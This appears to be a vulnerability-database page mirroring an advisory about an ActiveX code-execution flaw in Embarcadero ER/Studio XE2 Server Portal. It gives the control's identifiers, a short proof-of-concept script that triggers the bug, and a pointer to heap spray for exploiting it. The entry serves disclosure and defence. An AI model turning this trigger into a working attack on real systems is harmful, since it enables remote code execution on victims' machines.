Lucene search
K

Embarcadero ER/Studio XE2 Server Portal Code Execution

🗓️ 08 Sep 2011 00:00:00Reported by rgodType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 43 Views

Embarcadero ER/Studio XE2 Portal has a critical vulnerability allowing code execution via ActiveX.

Related
Code
`  
See: CVE-2011-2217  
reference url: http://www.securityfocus.com/bid/48099  
  
The mentioned product is vulnerable to the same issue.  
  
download url: https://downloads.embarcadero.com/free/er_studio_portal  
  
ActiveX settings:   
ProgID: TomSawyer.DefaultExtFactory.5.5.3.238.VS7.1  
CLSID: {658ED6E7-0DA1-4ADD-B2FB-095F08091118}  
Binary path: D:\Program Files\Embarcadero\ERStudioPortal1.6\PortalIntf\tsgetx71ex553.dll  
Safe for scripting (registry): true  
Safe for initialize (registry): true  
  
poc:  
  
<script>  
var obj = new ActiveXObject("TomSawyer.DefaultExtFactory.5.5.3.238.VS7.1");  
</script>  
  
then the dll will try to call inside an unitialized memory region  
which is reachable by an attacker through heap spray.  
  
//rgod  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Sep 2011 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.88064
43